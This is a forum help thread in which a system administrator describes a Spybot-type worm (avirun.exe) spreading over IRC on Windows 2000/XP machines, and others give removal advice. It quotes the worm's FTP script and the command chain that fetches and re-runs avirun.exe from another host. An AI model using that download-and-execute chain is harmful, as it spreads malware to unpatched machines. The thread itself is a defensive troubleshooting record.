unknown virus / backdoor trojan for IRC

i have discovered a viurs/backdoor trojan which i cannot find a resolution for.  i have pieces of the virus, but not the entire puzzle to clean the infected machines.  i have searched google, symantec, etc. for the process name (avirun.exe) but it was prob mutated.  here is what i have:

on windows 2000 and XP boxes i found a process that runs called avirun.exe. when it runs it makes the computer unable to accept connections mainly because the virus is opening the box to an IRC channel.  i have to reboot inorder to delete the avirun.exe, but first i have to delete all the "MSConfig" = "avirun.exe" out of the registry keys (and there are quit a few).  however, this prcoess comes back. i then found a file, named simply as "o" which is displayed below.  it looks as if this file FTP's the avirun.exe from another infected machine.  even if i delete all the entries, the avirun.exe and the o file, it still comes back.  making me think that it spreads via a Windows exploit.  i could not find any file (i checked recently mofied files) that is a batch that would call the o file to download the .exe or any other executables in the regedit Run's.  it looks like the Backdoor.Hacarmy.E trojan, except that it keeps coming back.

has anyone seen this? if so, is there a removal tool.  i think if you fully patch the OS and delete all parts, it will stay away, but i need to be able to get rid of it on unpatched systems to stop the spread.

FYI, a full symantec scan via the Internet or newest def's come up clean.

o file:

open [ip address] [port]
user 1 1
get avirun.exe
quit
LVL 8
xxgeniusAsked:
Who is Participating?
I wear a lot of hats...

"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.

Lobo042399Commented:
Hi xxgenius,

It sounds very interesting. The behaviour is that of a trojan. First thing I'd do is to download ProcessExplorer and run it. Look for the avirun and the o processes. in ProcessExplorer, souble-clicking on a process will bring up a wealth of info, including Registry keys and the IP number to which the process is connecting. If you have a Firewall, you can create a rule to block access to hat IP and then use KillBox to kill the offending files, but specially the o file, which is the monitor/downloader. Then you can use the info gathered from ProcessExplorer to clean up your Registry.

You can download ProcessExplorer and KillBox from:

http://www.gatesofdelirium.com/ee/tools/

By the way, before deleting these files I'd make a Zip file with them and send it to the guys at McAffee and Symantec for research.

Good Vibes!

Lobo
0
xxgeniusAuthor Commented:
These have been sent to Symantec and Sybari (which then dipurses them to other engines).  According to Symantec, their latest Rapid Response would catch it (haven't tried it yet).  I can say that your Windows must be patched and then you can delete the files.  Here is what the avirun.exe does when executed:

C:\WINDOWS\system32>avirun.exe
echo open [IPaddress Port] > o&echo user 1 1 >> o &echo get avirun.exe >> o &echo quit >> o &ftp -n -s:o &avirun.exe
0
xxgeniusAuthor Commented:
symantec definitions 11/5/04 Rev 5 will detect it as W32.Spybot.worm.  

To rid your machine: fully patch with windows and reboot.  then run antiv and delete files it finds.  delete the "o" file. open regedit, search for all strings for the process and delete.
0
GhostModCommented:
PAQd, 250 points refunded - asker posted solution

GhostMod
Community Support Moderator
0

Experts Exchange Solution brought to you by

Your issues matter to us.

Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.

Start your 7-day free trial
Lobo042399Commented:
kewlio
0
It's more than this solution.Get answers and train to solve all your tech problems - anytime, anywhere.Try it for free Edge Out The Competitionfor your dream job with proven skills and certifications.Get started today Stand Outas the employee with proven skills.Start learning today for free Move Your Career Forwardwith certification training in the latest technologies.Start your trial today
OS Security

From novice to tech pro — start learning today.

Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.